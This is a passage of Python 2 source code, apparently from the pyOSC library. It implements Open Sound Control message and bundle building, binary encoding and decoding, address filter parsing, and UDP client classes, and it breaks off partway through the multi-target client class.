> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [types.FloatType]
global IntTypes
IntTypes = [types.IntType]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retreiving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == types.DictType:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == types.TupleType:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == types.ListType:
items = []
for val in values:
if type(val) == types.TupleType:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == types.TupleType:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != types.SliceType:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(m))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objectss are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsuated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == types.DictType:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a mutiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in types.StringTypes:
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0L, 1L)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print "Error: too few bytes for int", data, len(data)
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low / NTP_units_per_second)
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print "Error: too few bytes for float", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print "Error: too few bytes for double", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print "byte 0 1 2 3 4 5 6 7 8 9 A B C D E F"
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print "%s: %s" % (line, repr(bytes[i-15:i+1]))
line = ""
bytes_left = num % 16
if bytes_left:
print "%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:]))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == types.TupleType:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == types.IntType:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in types.StringTypes and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = cmp(self.socket._sock, other.socket._sock)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return cmp(self.server, other.server)
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error, e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in types.StringTypes:
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in types.StringTypes:
(_, filters) = parseFilterStr(filters)
elif type(filters) != types.DictType:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
elif (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifing remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
